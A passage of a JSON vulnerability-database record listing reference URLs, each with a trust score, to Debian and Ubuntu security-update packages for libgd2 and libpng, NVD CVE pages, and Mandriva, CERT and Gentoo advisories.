        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3476"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3477"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.33-5.2etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.33-5.2etch1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.33-5.2etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.33-5.2etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3996"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-5.2etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.33-5.2etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1382"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0040"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-6218"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-5907"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/security/"
      },
      {
        "trust": 0.1,
        "url": "http://www.cert.org/advisories/684664"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5116"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5269"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2741"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5135"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0160"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2026"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5268"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3108"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5266"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0338"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5849"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1536"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-3108"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1969"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-1536"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5266"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2741"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1205"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1664"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0338"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/glsa/glsa-201412-11.xml"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2026"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-0720"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2877"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0339"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1969"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2445"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-0720"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-4995"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5849"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4995"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2877"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5268"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0339"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5116"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1664"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb"
      },
      {
        "trust": 0.1,
